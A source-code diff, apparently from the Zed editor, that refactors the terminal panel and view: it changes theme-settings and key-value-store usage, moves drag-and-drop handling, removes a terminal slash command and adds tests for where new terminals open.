{ diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index dc01a05dbe0c9c04398afc47a5cae1c2bd7b4e5d..0bb0837c6edb926cdcda70a54889de313cbe94f1 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -25,7 +25,8 @@ use terminal::{ }, terminal_settings::TerminalSettings, }; -use theme::{ActiveTheme, Theme, ThemeSettings}; +use theme::{ActiveTheme, Theme}; +use theme_settings::ThemeSettings; use ui::utils::ensure_minimum_contrast; use ui::{ParentElement, Tooltip}; use util::ResultExt; @@ -913,7 +914,9 @@ impl Element for TerminalElement { } TerminalMode::Standalone => terminal_settings .font_size - .map_or(buffer_font_size, |size| theme::adjusted_font_size(size, cx)), + .map_or(buffer_font_size, |size| { + theme_settings::adjusted_font_size(size, cx) + }), }; let theme = cx.theme().clone(); diff --git a/crates/terminal_view/src/terminal_panel.rs b/crates/terminal_view/src/terminal_panel.rs index 88bde3c771f72a0771a405cfbf123ac4e2286ad9..a813a1adc55fe5de75f5d9547839b15eb391192e 100644 --- a/crates/terminal_view/src/terminal_panel.rs +++ b/crates/terminal_view/src/terminal_panel.rs @@ -1,4 +1,4 @@ -use std::{cmp, ops::ControlFlow, path::PathBuf, process::ExitStatus, sync::Arc, time::Duration}; +use std::{cmp, path::PathBuf, process::ExitStatus, sync::Arc, time::Duration}; use crate::{ TerminalView, default_working_directory, @@ -8,15 +8,15 @@ use crate::{ }; use breadcrumbs::Breadcrumbs; use collections::HashMap; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use futures::{channel::oneshot, future::join_all}; use gpui::{ Action, AnyView, App, AsyncApp, AsyncWindowContext, Context, Corner, Entity, EventEmitter, - ExternalPaths, FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, - Task, WeakEntity, Window, actions, + FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, Task, WeakEntity, + Window, actions, 
}; use itertools::Itertools; -use project::{Fs, Project, ProjectEntryId}; +use project::{Fs, Project}; use settings::{Settings, TerminalDockPosition}; use task::{RevealStrategy, RevealTarget, Shell, ShellBuilder, SpawnInTerminal, TaskId}; @@ -28,13 +28,13 @@ use ui::{ use util::{ResultExt, TryFutureExt}; use workspace::{ ActivateNextPane, ActivatePane, ActivatePaneDown, ActivatePaneLeft, ActivatePaneRight, - ActivatePaneUp, ActivatePreviousPane, DraggedSelection, DraggedTab, ItemId, MoveItemToPane, + ActivatePaneUp, ActivatePreviousPane, DraggedTab, ItemId, MoveItemToPane, MoveItemToPaneInDirection, MovePaneDown, MovePaneLeft, MovePaneRight, MovePaneUp, Pane, PaneGroup, SplitDirection, SplitDown, SplitLeft, SplitMode, SplitRight, SplitUp, SwapPaneDown, SwapPaneLeft, SwapPaneRight, SwapPaneUp, ToggleZoom, Workspace, dock::{DockPosition, Panel, PanelEvent, PanelHandle}, item::SerializableItem, - move_active_item, move_item, pane, + move_active_item, pane, }; use anyhow::{Result, anyhow}; @@ -79,8 +79,6 @@ pub struct TerminalPanel { pub(crate) center: PaneGroup, fs: Arc, workspace: WeakEntity, - pub(crate) width: Option, - pub(crate) height: Option, pending_serialization: Task>, pending_terminals_to_add: usize, deferred_tasks: HashMap>, @@ -100,8 +98,6 @@ impl TerminalPanel { fs: workspace.app_state().fs.clone(), workspace: workspace.weak_handle(), pending_serialization: Task::ready(None), - width: None, - height: None, pending_terminals_to_add: 0, deferred_tasks: HashMap::default(), assistant_enabled: false, @@ -133,7 +129,11 @@ impl TerminalPanel { } } - fn apply_tab_bar_buttons(&self, terminal_pane: &Entity, cx: &mut Context) { + pub(crate) fn apply_tab_bar_buttons( + &self, + terminal_pane: &Entity, + cx: &mut Context, + ) { let assistant_tab_bar_button = self.assistant_tab_bar_button.clone(); terminal_pane.update(cx, |pane, cx| { pane.set_render_tab_bar_buttons(cx, move |pane, window, cx| { @@ -246,16 +246,17 @@ impl TerminalPanel { ) -> Result> { let mut 
terminal_panel = None; - if let Some((database_id, serialization_key)) = workspace - .read_with(&cx, |workspace, _| { + if let Some((database_id, serialization_key, kvp)) = workspace + .read_with(&cx, |workspace, cx| { workspace .database_id() .zip(TerminalPanel::serialization_key(workspace)) + .map(|(id, key)| (id, key, KeyValueStore::global(cx))) }) .ok() .flatten() && let Some(serialized_panel) = cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) + .background_spawn(async move { kvp.read_kvp(&serialization_key) }) .await .log_err() .flatten() @@ -652,6 +653,27 @@ impl TerminalPanel { window: &mut Window, cx: &mut Context, ) { + let center_pane = workspace.active_pane(); + let center_pane_has_focus = center_pane.focus_handle(cx).contains_focused(window, cx); + let active_center_item_is_terminal = center_pane + .read(cx) + .active_item() + .is_some_and(|item| item.downcast::().is_some()); + + if center_pane_has_focus && active_center_item_is_terminal { + let working_directory = default_working_directory(workspace, cx); + let local = action.local; + Self::add_center_terminal(workspace, window, cx, move |project, cx| { + if local { + project.create_local_terminal(cx) + } else { + project.create_terminal_shell(working_directory, cx) + } + }) + .detach_and_log_err(cx); + return; + } + let Some(terminal_panel) = workspace.panel::(cx) else { return; }; @@ -923,8 +945,6 @@ impl TerminalPanel { } fn serialize(&mut self, cx: &mut Context) { - let height = self.height; - let width = self.width; let Some(serialization_key) = self .workspace .read_with(cx, |workspace, _| { @@ -935,6 +955,7 @@ impl TerminalPanel { else { return; }; + let kvp = KeyValueStore::global(cx); self.pending_serialization = cx.spawn(async move |terminal_panel, cx| { cx.background_executor() .timer(Duration::from_millis(50)) @@ -949,17 +970,14 @@ impl TerminalPanel { }); cx.background_spawn( async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - 
serde_json::to_string(&SerializedTerminalPanel { - items, - active_item_id: None, - height, - width, - })?, - ) - .await?; + kvp.write_kvp( + serialization_key, + serde_json::to_string(&SerializedTerminalPanel { + items, + active_item_id: None, + })?, + ) + .await?; anyhow::Ok(()) } .log_err(), @@ -1187,7 +1205,6 @@ pub fn new_terminal_pane( window: &mut Window, cx: &mut Context, ) -> Entity { - let is_local = project.read(cx).is_local(); let terminal_panel = cx.entity(); let pane = cx.new(|cx| { let mut pane = Pane::new( @@ -1245,113 +1262,6 @@ pub fn new_terminal_pane( toolbar.add_item(breadcrumbs, window, cx); }); - let drop_closure_project = project.downgrade(); - let drop_closure_terminal_panel = terminal_panel.downgrade(); - pane.set_custom_drop_handle(cx, move |pane, dropped_item, window, cx| { - let Some(project) = drop_closure_project.upgrade() else { - return ControlFlow::Break(()); - }; - if let Some(tab) = dropped_item.downcast_ref::() { - let this_pane = cx.entity(); - let item = if tab.pane == this_pane { - pane.item_for_index(tab.ix) - } else { - tab.pane.read(cx).item_for_index(tab.ix) - }; - if let Some(item) = item { - if item.downcast::().is_some() { - let source = tab.pane.clone(); - let item_id_to_move = item.item_id(); - - // If no split direction, let the regular pane drop handler take care of it - let Some(split_direction) = pane.drag_split_direction() else { - return ControlFlow::Continue(()); - }; - - // Gather data synchronously before deferring - let is_zoomed = drop_closure_terminal_panel - .upgrade() - .map(|terminal_panel| { - let terminal_panel = terminal_panel.read(cx); - if terminal_panel.active_pane == this_pane { - pane.is_zoomed() - } else { - terminal_panel.active_pane.read(cx).is_zoomed() - } - }) - .unwrap_or(false); - - let workspace = workspace.clone(); - let terminal_panel = drop_closure_terminal_panel.clone(); - - // Defer the split operation to avoid re-entrancy panic. 
- // The pane may be the one currently being updated, so we cannot - // call mark_positions (via split) synchronously. - cx.spawn_in(window, async move |_, cx| { - cx.update(|window, cx| { - let Ok(new_pane) = - terminal_panel.update(cx, |terminal_panel, cx| { - let new_pane = new_terminal_pane( - workspace, project, is_zoomed, window, cx, - ); - terminal_panel.apply_tab_bar_buttons(&new_pane, cx); - terminal_panel.center.split( - &this_pane, - &new_pane, - split_direction, - cx, - ); - new_pane - }) - else { - return; - }; - - move_item( - &source, - &new_pane, - item_id_to_move, - new_pane.read(cx).active_item_index(), - true, - window, - cx, - ); - }) - .ok(); - }) - .detach(); - } else if let Some(project_path) = item.project_path(cx) - && let Some(entry_path) = project.read(cx).absolute_path(&project_path, cx) - { - add_paths_to_terminal(pane, &[entry_path], window, cx); - } - } - } else if let Some(selection) = dropped_item.downcast_ref::() { - let project = project.read(cx); - let paths_to_add = selection - .items() - .map(|selected_entry| selected_entry.entry_id) - .filter_map(|entry_id| project.path_for_entry(entry_id, cx)) - .filter_map(|project_path| project.absolute_path(&project_path, cx)) - .collect::>(); - if !paths_to_add.is_empty() { - add_paths_to_terminal(pane, &paths_to_add, window, cx); - } - } else if let Some(&entry_id) = dropped_item.downcast_ref::() { - if let Some(entry_path) = project - .read(cx) - .path_for_entry(entry_id, cx) - .and_then(|project_path| project.read(cx).absolute_path(&project_path, cx)) - { - add_paths_to_terminal(pane, &[entry_path], window, cx); - } - } else if is_local && let Some(paths) = dropped_item.downcast_ref::() { - add_paths_to_terminal(pane, paths.paths(), window, cx); - } - - ControlFlow::Break(()) - }); - pane }); @@ -1376,27 +1286,6 @@ async fn wait_for_terminals_tasks( join_all(pending_tasks).await; } -fn add_paths_to_terminal( - pane: &mut Pane, - paths: &[PathBuf], - window: &mut Window, - cx: &mut 
Context, -) { - if let Some(terminal_view) = pane - .active_item() - .and_then(|item| item.downcast::()) - { - window.focus(&terminal_view.focus_handle(cx), cx); - let mut new_text = paths.iter().map(|path| format!(" {path:?}")).join(""); - new_text.push(' '); - terminal_view.update(cx, |terminal_view, cx| { - terminal_view.terminal().update(cx, |terminal, _| { - terminal.paste(&new_text); - }); - }); - } -} - struct FailedToSpawnTerminal { error: String, focus_handle: FocusHandle, @@ -1677,25 +1566,26 @@ impl Panel for TerminalPanel { }); } - fn size(&self, window: &Window, cx: &App) -> Pixels { + fn default_size(&self, window: &Window, cx: &App) -> Pixels { let settings = TerminalSettings::get_global(cx); match self.position(window, cx) { - DockPosition::Left | DockPosition::Right => { - self.width.unwrap_or(settings.default_width) - } - DockPosition::Bottom => self.height.unwrap_or(settings.default_height), + DockPosition::Left | DockPosition::Right => settings.default_width, + DockPosition::Bottom => settings.default_height, } } - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context) { - match self.position(window, cx) { - DockPosition::Left | DockPosition::Right => self.width = size, - DockPosition::Bottom => self.height = size, - } - cx.notify(); - cx.defer_in(window, |this, _, cx| { - this.serialize(cx); - }) + fn supports_flexible_size(&self) -> bool { + true + } + + fn has_flexible_size(&self, _window: &Window, cx: &App) -> bool { + TerminalSettings::get_global(cx).flexible + } + + fn set_flexible_size(&mut self, flexible: bool, _window: &mut Window, cx: &mut Context) { + settings::update_settings_file(self.fs.clone(), cx, move |settings, _| { + settings.terminal.get_or_insert_default().flexible = Some(flexible); + }); } fn is_zoomed(&self, _window: &Window, cx: &App) -> bool { @@ -1731,6 +1621,9 @@ impl Panel for TerminalPanel { } fn icon_label(&self, _window: &Window, cx: &App) -> Option { + if 
!TerminalSettings::get_global(cx).show_count_badge { + return None; + } let count = self .center .panes() @@ -1767,7 +1660,7 @@ impl Panel for TerminalPanel { } fn toggle_action(&self) -> Box { - Box::new(ToggleFocus) + Box::new(Toggle) } fn pane(&self) -> Option> { @@ -1775,7 +1668,7 @@ impl Panel for TerminalPanel { } fn activation_priority(&self) -> u32 { - 1 + 2 } } @@ -2025,6 +1918,436 @@ mod tests { ); } + async fn init_workspace_with_panel( + cx: &mut TestAppContext, + ) -> (gpui::WindowHandle, Entity) { + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let window_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + let terminal_panel = window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let panel = cx.new(|cx| TerminalPanel::new(workspace, window, cx)); + workspace.add_panel(panel.clone(), window, cx); + panel + }) + }) + .expect("Failed to initialize workspace with terminal panel"); + + (window_handle, terminal_panel) + } + + #[gpui::test] + async fn test_new_terminal_opens_in_panel_by_default(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + + cx.run_until_parked(); + + let panel_items_after = + 
terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + assert_eq!( + panel_items_after, + panel_items_before + 1, + "Terminal should be added to the panel when no center terminal is focused" + ); + assert_eq!( + center_items_after, center_items_before, + "Center pane should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_terminal_opens_in_center_when_center_terminal_focused( + cx: &mut TestAppContext, + ) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::add_center_terminal(workspace, window, cx, |project, cx| { + project.create_terminal_shell(None, cx) + }) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create center terminal"); + cx.run_until_parked(); + + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + assert_eq!(center_items_before, 1, "Center pane should have 1 terminal"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let active_item = workspace + .active_pane() + .read(cx) + .active_item() + .expect("Center pane should have an active item"); + let terminal_view = active_item + .downcast::() + .expect("Active center item should be a TerminalView"); + window.focus(&terminal_view.focus_handle(cx), cx); + }) + }) + .expect("Failed to focus terminal view"); + cx.run_until_parked(); + + let 
panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + cx.run_until_parked(); + + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + assert_eq!( + center_items_after, + center_items_before + 1, + "New terminal should be added to the center pane" + ); + assert_eq!( + panel_items_after, panel_items_before, + "Terminal panel should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_terminal_opens_in_panel_when_panel_focused(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |_, window, cx| { + terminal_panel.update(cx, |panel, cx| { + panel.add_terminal_shell(None, RevealStrategy::Always, window, cx) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create panel terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |_, window, cx| { + window.focus(&terminal_panel.read(cx).focus_handle(cx), cx); + }) + .expect("Failed to focus terminal panel"); + cx.run_until_parked(); + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + 
.expect("Failed to read center pane items"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + cx.run_until_parked(); + + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + assert_eq!( + panel_items_after, + panel_items_before + 1, + "New terminal should be added to the panel when panel is focused" + ); + assert_eq!( + center_items_after, center_items_before, + "Center pane should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_local_terminal_opens_in_center_when_center_terminal_focused( + cx: &mut TestAppContext, + ) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::add_center_terminal(workspace, window, cx, |project, cx| { + project.create_terminal_shell(None, cx) + }) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create center terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let active_item = workspace + .active_pane() + .read(cx) + .active_item() + .expect("Center pane should have an active item"); + let terminal_view = active_item + .downcast::() + .expect("Active center item should be a TerminalView"); + window.focus(&terminal_view.focus_handle(cx), cx); + }) + }) + 
.expect("Failed to focus terminal view"); + cx.run_until_parked(); + + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal { local: true }, + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal with local=true"); + cx.run_until_parked(); + + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + assert_eq!( + center_items_after, + center_items_before + 1, + "New local terminal should be added to the center pane" + ); + assert_eq!( + panel_items_after, panel_items_before, + "Terminal panel should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_terminal_opens_in_panel_when_panel_focused_and_center_has_terminal( + cx: &mut TestAppContext, + ) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::add_center_terminal(workspace, window, cx, |project, cx| { + project.create_terminal_shell(None, cx) + }) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create center terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |_, window, 
cx| { + terminal_panel.update(cx, |panel, cx| { + panel.add_terminal_shell(None, RevealStrategy::Always, window, cx) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create panel terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |_, window, cx| { + window.focus(&terminal_panel.read(cx).focus_handle(cx), cx); + }) + .expect("Failed to focus terminal panel"); + cx.run_until_parked(); + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + cx.run_until_parked(); + + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + assert_eq!( + panel_items_after, + panel_items_before + 1, + "New terminal should go to panel when panel is focused, even if center has a terminal" + ); + assert_eq!( + center_items_after, center_items_before, + "Center pane should not gain a new terminal when panel is focused" + ); + } + fn set_max_tabs(cx: &mut TestAppContext, value: Option) { cx.update_global(|store: &mut SettingsStore, cx| { store.update_user_settings(cx, |settings| { @@ -2037,7 +2360,7 @@ mod tests { cx.update(|cx| { let store = SettingsStore::test(cx); cx.set_global(store); - 
theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); }); diff --git a/crates/terminal_view/src/terminal_path_like_target.rs b/crates/terminal_view/src/terminal_path_like_target.rs index 18eab6fc5b4ccca1bcc6db33a35dc490582037ac..f0f13d8fc2cd737722f30d7e56248e4284ed4495 100644 --- a/crates/terminal_view/src/terminal_path_like_target.rs +++ b/crates/terminal_view/src/terminal_path_like_target.rs @@ -554,7 +554,7 @@ mod tests { let fs = app_cx.update(AppState::test).fs.as_fake().clone(); app_cx.update(|cx| { - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); }); diff --git a/crates/terminal_view/src/terminal_scrollbar.rs b/crates/terminal_view/src/terminal_scrollbar.rs index 82ca0b4097dad1be899879b0241aed50d8e60bfa..16dc580e877310b79501ca469b0351935dbb46f7 100644 --- a/crates/terminal_view/src/terminal_scrollbar.rs +++ b/crates/terminal_view/src/terminal_scrollbar.rs @@ -3,7 +3,7 @@ use std::{ rc::Rc, }; -use gpui::{Bounds, Point, Size, size}; +use gpui::{Bounds, Point, point, size}; use terminal::Terminal; use ui::{Pixels, ScrollableHandle, px}; @@ -46,9 +46,9 @@ impl TerminalScrollHandle { } impl ScrollableHandle for TerminalScrollHandle { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { let state = self.state.borrow(); - size( + point( Pixels::ZERO, state.total_lines.saturating_sub(state.viewport_lines) as f32 * state.line_height, ) diff --git a/crates/terminal_view/src/terminal_slash_command.rs b/crates/terminal_view/src/terminal_slash_command.rs deleted file mode 100644 index 13c2cef48c3596d77c1bc7f00587f17dfc1c75e5..0000000000000000000000000000000000000000 --- a/crates/terminal_view/src/terminal_slash_command.rs +++ /dev/null @@ -1,129 +0,0 @@ -use std::sync::Arc; -use std::sync::atomic::AtomicBool; - -use crate::{TerminalView, terminal_panel::TerminalPanel}; -use anyhow::Result; -use 
assistant_slash_command::{ - ArgumentCompletion, SlashCommand, SlashCommandOutput, SlashCommandOutputSection, - SlashCommandResult, -}; -use gpui::{App, Entity, Task, WeakEntity}; -use language::{BufferSnapshot, CodeLabel, LspAdapterDelegate}; -use ui::prelude::*; -use workspace::{Workspace, dock::Panel}; - -use assistant_slash_command::create_label_for_command; - -pub struct TerminalSlashCommand; - -const LINE_COUNT_ARG: &str = "--line-count"; - -const DEFAULT_CONTEXT_LINES: usize = 50; - -impl SlashCommand for TerminalSlashCommand { - fn name(&self) -> String { - "terminal".into() - } - - fn label(&self, cx: &App) -> CodeLabel { - create_label_for_command("terminal", &[LINE_COUNT_ARG], cx) - } - - fn description(&self) -> String { - "Insert terminal output".into() - } - - fn icon(&self) -> IconName { - IconName::Terminal - } - - fn menu_text(&self) -> String { - self.description() - } - - fn requires_argument(&self) -> bool { - false - } - - fn accepts_arguments(&self) -> bool { - true - } - - fn complete_argument( - self: Arc, - _arguments: &[String], - _cancel: Arc, - _workspace: Option>, - _window: &mut Window, - _cx: &mut App, - ) -> Task>> { - Task::ready(Ok(Vec::new())) - } - - fn run( - self: Arc, - arguments: &[String], - _context_slash_command_output_sections: &[SlashCommandOutputSection], - _context_buffer: BufferSnapshot, - workspace: WeakEntity, - _delegate: Option>, - _: &mut Window, - cx: &mut App, - ) -> Task { - let Some(workspace) = workspace.upgrade() else { - return Task::ready(Err(anyhow::anyhow!("workspace was dropped"))); - }; - - let Some(active_terminal) = resolve_active_terminal(&workspace, cx) else { - return Task::ready(Err(anyhow::anyhow!("no active terminal"))); - }; - - let line_count = arguments - .get(0) - .and_then(|s| s.parse::().ok()) - .unwrap_or(DEFAULT_CONTEXT_LINES); - - let lines = active_terminal - .read(cx) - .entity() - .read(cx) - .last_n_non_empty_lines(line_count); - - let mut text = String::new(); - 
text.push_str("Terminal output:\n"); - text.push_str(&lines.join("\n")); - let range = 0..text.len(); - - Task::ready(Ok(SlashCommandOutput { - text, - sections: vec![SlashCommandOutputSection { - range, - icon: IconName::Terminal, - label: "Terminal".into(), - metadata: None, - }], - run_commands_in_text: false, - } - .into_event_stream())) - } -} - -fn resolve_active_terminal( - workspace: &Entity, - cx: &mut App, -) -> Option> { - if let Some(terminal_view) = workspace - .read(cx) - .active_item(cx) - .and_then(|item| item.act_as::(cx)) - { - return Some(terminal_view); - } - - let terminal_panel = workspace.read(cx).panel::(cx)?; - terminal_panel.read(cx).pane().and_then(|pane| { - pane.read(cx) - .active_item() - .and_then(|t| t.downcast::()) - }) -} diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index eaba1f22682a759d8cfce42e555ca692cee9ada6..acccd6129f75ee2f5213fa359203220a7fee08c0 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -3,23 +3,26 @@ pub mod terminal_element; pub mod terminal_panel; mod terminal_path_like_target; pub mod terminal_scrollbar; -mod terminal_slash_command; -use assistant_slash_command::SlashCommandRegistry; -use editor::{Editor, EditorSettings, actions::SelectAll, blink_manager::BlinkManager}; +use editor::{ + Editor, EditorSettings, actions::SelectAll, blink_manager::BlinkManager, + ui_scrollbar_settings_from_raw, +}; use gpui::{ - Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, FocusHandle, - Focusable, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent, Pixels, Point, - Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions, anchored, deferred, - div, + Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, ExternalPaths, + FocusHandle, Focusable, Font, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent, + Pixels, Point, Render, 
ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions, + anchored, deferred, div, }; +use itertools::Itertools; use menu; -use persistence::TERMINAL_DB; -use project::{Project, search::SearchQuery}; +use persistence::TerminalDb; +use project::{Project, ProjectEntryId, search::SearchQuery}; use schemars::JsonSchema; use serde::Deserialize; use settings::{Settings, SettingsStore, TerminalBlink, WorkingDirectory}; use std::{ + any::Any, cmp, ops::{Range, RangeInclusive}, path::{Path, PathBuf}, @@ -42,18 +45,17 @@ use terminal_element::TerminalElement; use terminal_panel::TerminalPanel; use terminal_path_like_target::{hover_path_like_target, open_path_like_target}; use terminal_scrollbar::TerminalScrollHandle; -use terminal_slash_command::TerminalSlashCommand; use ui::{ ContextMenu, Divider, ScrollAxes, Scrollbars, Tooltip, WithScrollbar, prelude::*, - scrollbars::{self, GlobalSetting, ScrollbarVisibility}, + scrollbars::{self, ScrollbarVisibility}, }; use util::ResultExt; use workspace::{ - CloseActiveItem, NewCenterTerminal, NewTerminal, ToolbarItemLocation, Workspace, WorkspaceId, - delete_unloaded_items, + CloseActiveItem, DraggedSelection, DraggedTab, NewCenterTerminal, NewTerminal, Pane, + ToolbarItemLocation, Workspace, WorkspaceId, delete_unloaded_items, item::{ - BreadcrumbText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent, + HighlightedText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent, }, register_serializable_item, searchable::{ @@ -96,7 +98,6 @@ actions!( pub struct RenameTerminal; pub fn init(cx: &mut App) { - assistant_slash_command::init(cx); terminal_panel::init(cx); register_serializable_item::(cx); @@ -105,7 +106,6 @@ pub fn init(cx: &mut App) { workspace.register_action(TerminalView::deploy); }) .detach(); - SlashCommandRegistry::global(cx).register_command(TerminalSlashCommand, true); } pub struct BlockProperties { @@ -752,7 +752,14 @@ impl TerminalView { } pub fn 
should_show_cursor(&self, focused: bool, cx: &mut Context) -> bool { - // Always show cursor when not focused or in special modes + // Hide cursor when in embedded mode and not focused (read-only output like Agent panel) + if let TerminalMode::Embedded { .. } = &self.mode { + if !focused { + return false; + } + } + + // For Standalone mode: always show cursor when not focused or in special modes if !focused || self .terminal @@ -811,17 +818,16 @@ impl TerminalView { return; }; - if clipboard.entries().iter().any(|entry| match entry { - ClipboardEntry::Image(image) => !image.bytes.is_empty(), - _ => false, - }) { - self.forward_ctrl_v(cx); - return; - } - - if let Some(text) = clipboard.text() { - self.terminal - .update(cx, |terminal, _cx| terminal.paste(&text)); + match clipboard.entries().first() { + Some(ClipboardEntry::Image(image)) if !image.bytes.is_empty() => { + self.forward_ctrl_v(cx); + } + _ => { + if let Some(text) = clipboard.text() { + self.terminal + .update(cx, |terminal, _cx| terminal.paste(&text)); + } + } } } @@ -833,8 +839,18 @@ impl TerminalView { }); } + fn add_paths_to_terminal(&self, paths: &[PathBuf], window: &mut Window, 